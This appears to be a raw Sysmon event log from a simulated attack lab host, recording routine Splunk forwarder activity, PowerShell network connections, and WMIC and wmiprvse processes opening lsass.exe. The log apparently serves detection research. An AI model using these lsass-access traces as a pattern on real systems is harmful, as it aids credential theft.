AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:28.034{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AE54460B2F3D0F709850EDCB17C8DF49,SHA256=24D4E9B05DAB3FA147AA1C0A7768607BF836D4BCBDC3040665FDB75D12853A36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:29.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB6A73220D41133C86CD790131565EF1,SHA256=A8FB6C535103DD3938FC51582E76CA9CA9E36AB1D39D0BAEC63B411337BA1917,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2ABB86CA1A86A19ADC1737C91087030,SHA256=6FE5B2C998DB091F8F490836B3408EA84083D47EC509FF6921226CBA8DD7440E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:29.349{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51AE5CAD281C1F2CF0EE2B5E13361573,SHA256=0A057DF35C5FBF8E19CA680547FBD7D82F4B8AF4051CB4CC8D8B078AC7BE9AC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:56.072{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56750-false10.0.1.12-8000- 23542300x800000000000000035085626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:31.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92DBF4FFF53D9A3EEAF89E8A9CA5AA50,SHA256=84B74906FC7960BF5BE8D96978405C3B1D4DAD595DE4909D08BC575A95C6F724,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:32.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A2570AA47FBC84ECF5406FF61F4BED,SHA256=6985D0F756B667ED34892FC7F8FB65421096B07535A14533EBE91DDE5253BA61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:57.940{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56751-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A6F896D7B7E021380D42A9514C50DAF4,SHA256=C1887DBBA096C01C9684F3E069F8323D2CC8557B019BBD67F89E509CC038C32E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:33.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A69553851B55C4923859D43F55B5BF,SHA256=9933C1FCA8AADEEC7ADCD7274912B41548D19CB3EEFD057528461B21610E800C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:34.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2347E01C850AD344D5BC20C3557B83A6,SHA256=4A1F35445DBBB51A18C1C1982F201016139CBC6D5143CC00049948484ACCFC37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:35.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7755B20225BED2088D8253D96E569D9E,SHA256=8211345B117D6135498E451AA33D1C31AD96E6BFA98D4DCD74BB72113E4661AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085635Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:36.433{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=108D8C4F62EB37696C2081F3B0A16092,SHA256=F849CE1C244024E310703F96D528D2F8A21C57D1DBCDEF5959D837B1B5E5EF13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:36.131{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3D2B7F3152DF3D5A8230925E58C2956,SHA256=0FEEAED675A2BE0CB8CB346C1953474373B4CA41310F7ADC74FD4193B414B649,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085637Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:37.132{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F82E026AB067DD42DC0802F12F38C50,SHA256=5070010CDF47E3475F21D75484236C8AC3CBC1DFA0DDAF56C140CDBF9AC16AAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085636Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:01.256{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56752-false10.0.1.12-8000- 23542300x800000000000000035085638Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:38.162{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1687212961B5E9BD1152466E6FD2C1CB,SHA256=4462F3B2963CC7964FD0F5BC386225DE0D9B51D7600DED1F22BE19176F656F2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085641Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:03.941{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56753-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085640Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C0D6C696391A19E93D35EB6CA3AAD7,SHA256=2BF0502AD1616B80C556918BC48C105B27E8D31072B9A821F70DF848AA31E0FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085639Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:39.083{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=24E2C1F364FC131EA937D49A7FC280CF,SHA256=1A6F0D0EC1C54E6ACCF181E90D0E485880FCEDA4F121DA219B78FD832C341EBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085642Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:40.198{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70105F8F9599B2FB37449BC8789E068,SHA256=4F4B05BBD8DD327038781B696DBE6104943DBEB8835A011912F941AB311CF019,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085643Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:41.228{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6EB714D68731EB85528C30800787750,SHA256=FEAE94973F932AAF801A3709E3BEC5EAFB745E87100653473F45AA52BF8079F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.995{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.995{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.980{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.980{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.980{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.977{B81B27B7-4013-611D-1600-00000000C801}11961436C:\Windows\system32\svchost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.977{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:42.958{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085660Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.958{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085659Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:42.958{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085657Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085656Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085655Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085654Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.942{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 